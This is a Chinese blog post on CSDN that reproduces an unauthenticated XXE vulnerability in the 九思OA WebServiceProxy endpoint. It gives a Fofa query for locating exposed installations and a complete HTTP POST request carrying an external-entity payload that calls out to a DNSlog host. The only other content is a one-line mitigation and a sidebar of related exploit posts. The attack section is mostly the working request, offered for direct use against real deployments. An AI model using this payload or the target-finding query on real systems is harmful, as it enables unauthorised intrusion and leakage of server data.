九思OA XXE漏洞复现

已于 2024-08-27 17:20:42 修改
阅读量542 收藏
点赞数 8
分类专栏: 漏洞复现 文章标签: web安全
于 2024-08-23 16:35:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xc_214/article/details/141469072
版权

0X01 漏洞描述:

九思OA /jsoa/WebServiceProxy 接口处存在XML实体注入漏洞,未经身份认证的攻击者可利用此漏洞获取服务器内部敏感数据,调用外部非可信源实体。

0x02 搜索语句:

Fofa:body="/jsoa/login.jsp"

0x03 漏洞复现:

POST /jsoa/WebServiceProxy HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Content-Type: application/x-www-form-urlencoded
Connection: close
 
<!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://123.z45sd4.dnslog.cn"> %remote;]>

使用自带dns

0x04 修复建议

关闭互联网暴露面或接口设置访问权限

iSee857
关注
专栏目录
西软云XMS getresponseasync XXE漏洞复现
0xSec
04-17 600
西软云XMSgetresponseasync 接口处存在XML实体注入漏洞,未经身份认证的攻击者可利用此漏洞获取服务器内部敏感数据,使系统处于极不安全状态。
九思OA软件user_list_3g.jsp存在SQL注入漏洞
做自己喜欢的事,并将其发挥到极致!
02-28 724
九思软件为中国高端OA系统知名品牌,九思OA软件`user_list_3g.jsp`存在SQL注入漏洞
某购物商城系统commodtiy接口处存在任意文件上传漏洞
weixin_43167326的博客
05-10 910
某购物商城系统commodtiy接口处存在任意文件上传漏洞,恶意攻击者可以上传恶意软件,例如后门、木马或勒索软件,以获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。
复现九思OA系统 SQL注入漏洞_43
fushuang333的博客
02-08 1236
复现九思OA系统 SQL注入漏洞,攻击者未经授权可以访问数据库中的数据,盗取用户的隐私以及个人信息,造成用户的信息泄露。
热网无线监测系统GetDataKindByType存在SQL注入漏洞
最新发布
weixin_43167326的博客
09-04 758
山东思达特测控设备有限公司是以物联网科技、信息通讯、知识数字化为基础,以先进智造技术为依托的综合性能源解决方案服务商,在智慧热力、智慧燃气、智慧水务、分布式能源等领域深耕技术,为客户提供安全运维、数字计量、绿色环保、高效节能的综合性服务解决方案。山东思达特测控设备有限公司热网无线监测系统 GetDataKindByType存在SQL注入漏洞
九思OA wap.do接口任意文件读取漏洞复现 [附POC]
薛定谔嘚喵博客
12-25 599
九思协同办公软件wap.do接口处存在任意文件读取漏洞,攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等。
九思OA wap.do 任意文件读取漏洞复现
0xSec
12-21 1561
北京九思协同办公软件wap.do接口处存在任意文件读取漏洞,攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
九思OA /jsoa/WebServiceProxy XXE漏洞复现
0xSec
08-15 380
九思OA /jsoa/WebServiceProxy 接口处存在XML实体注入漏洞,未经身份认证的攻击者可利用此漏洞获取服务器内部敏感数据,使系统处于极不安全状态。
漏洞复现九思OA-wap-任意文件读取
知黑而守白
01-15 229
九思OA办公软件全面实现协同工作、公文、流程审批、知识管理、项目管理、综合办公、信息共享、移动办公 等应用功能,并能够与其他异构系统整合,打破信息孤岛,建立完整的有效的企业工作平台和移动办公软件。九思OA协同办公系统 wap 接口存在文件读取漏洞。攻击者可以通过恶意构造的请求读取服务器上的任意文件,包括敏感的系统文件。此漏洞可能导致泄露敏感信息,为攻击者提供足够的信息来进一步渗透系统。
九思OA user_list_3g.jsp SQL注入漏洞复现
0xSec
02-02 497
北京九思协同办公软件user_list_3g.jsp接口处存在SQL注入漏洞,攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
漏洞复现九思OA-user-list-3g-sql注入
知黑而守白
02-02 342
九思OA办公软件全面实现协同工作、公文、流程审批、知识管理、项目管理、综合办公、信息共享、移动办公 等应用功能,并能够与其他异构系统整合,打破信息孤岛,建立完整的有效的企业工作平台和移动办公软件。九思OA协同办公系统 user_list_3g 接口存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
漏洞复现九思OA user_list_3g.jsp 存在SQL注入漏洞
KKleeeaa的博客
02-06 431
声明:亲爱的读者,我们诚挚地提醒您,Aniya网络安全的技术文章仅供个人研究学习参考。任何因传播或利用本实验室提供的信息而造成的直接或间接后果及损失,均由使用者自行承担责任。Aniya网络安全及作者对此概不负责。如有侵权,请立即告知,我们将立即删除并致歉。九思OA中的user_list_3g.jsp接口处存在SQL注入漏洞,攻击者可通过此漏洞进一步渗透,甚至获取管理员账户密码。用户输入的参数进行限制。增加WAF,设置白名单。0x02FOFA语句。
Web安全XXE漏洞
zkaqlaoniao的博客
11-24 470
XXE漏洞指的是XML外部实体注入(XML External Entity Injection)漏洞,它是一种常见的安全漏洞类型,可以用来攻击基于XML的应用程序。当应用程序接受XML输入时,攻击者可以插入带有外部实体引用的恶意XML数据,从而导致应用程序执行未经授权的操作,比如访问本地文件系统、执行远程代码等。攻击者可以通过利用XXE漏洞来获取敏感信息、控制服务器,或者执行其他恶意操作。
2023 致远OA-任意用户密码重置漏洞
weixin_45908624的博客
09-14 2889
致远OA 短信验证码绕过重置密码漏洞
渗透测试——漏洞扫描工具
wuli1024的博客
11-20 1111
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取不出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好,随后将会更新补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个网站,输入自己的邮箱获取激活码。
致远OA SQL&任意文件下载漏洞(含批量检测POC)
今天是几号的博客
03-21 3460
通过信息收集,查出web根目录D:/UFseeyon/OA/tomcat/webapps/yyoa,通过 into outfile 写入文件,这里因为 jsp木马存在特殊符号,使用 hex编码 上传允许文件上传的jsp文件。致远OA webmail.do文件读取漏洞,由于/seeyon/webmail.do 页面 filePath 参数过滤不严,导致可以读取系统敏感文件。致远OA A6 test.jsp 存在sql注入漏洞,并可以通过注入写入webshell文件控制服务器。app=“致远互联-OA
【新】致远OA从前台XXE到RCE漏洞分析
C20220511的博客
11-06 3004
和我们之前分享过的通达OA漏洞类似,这类主流OA系统现在想要直接一步达到RCE的效果是非常困难的。根据错误提示反向找到对应的逻辑代码com.seeyon.agent.common.interceptor. SecurityInterceptor的preHandle方法,这应该是全局的拦截器,其中关键的代码如图3.6所示。在java环境下是不能直接通过XXE来执行系统命令的,并且这里的XXE是不具有回显的功能,仅能通过XXE来达到SSRF的效果,并且只能进行GET类型的请求。那么这些参数是怎么来的呢?
漏洞复现】致远互联 OA fileUpload.do 文件上传漏洞
qq_34914659的博客
06-18 1526
致远OA是一款企业级办公自动化软件,提供了办公流程管理、文档管理、协同办公、知识管理等功能。它可以帮助企业实现信息化办公,提高工作效率和协同能力。该系统fileUpload.do存在文件上传漏洞
oa项目java_九思软件:CIO选型OA办公系统实操方法
05-17
在选型OA办公系统之前,需要先明确自己的需求,以及公司的规模、业务流程等情况。接下来,可以按照以下实操方法进行选型: 1. 制定选型标准:根据公司的需求和规模,制定选型标准,包括功能需求、性能要求、安全要求、可扩展性等。 2. 筛选供应商:通过咨询、网络搜索等方式筛选合适的供应商,对比其产品的特点、价格、服务等因素,并选择几家供应商进行比较。 3. 考察供应商:对于选定的几家供应商,可以进行考察,包括实地考察、客户参考、产品演示等方式,以了解其实力、服务能力、产品质量等。 4. 评估和选择:根据考察结果和选型标准,对几家供应商进行评估和比较,最终选择最符合公司需求的供应商和产品。 5. 实施和推广:在选定供应商后,需要对其产品进行实施和推广,包括培训、数据迁移、配置调试等工作,确保其能够顺利地应用到公司的日常办公中。 需要注意的是,在选型过程中,除了考虑产品本身的特点和供应商的实力外,还需要考虑其后续的服务支持和维护能力,以确保其能够长期稳定地运行。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

iSee857

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值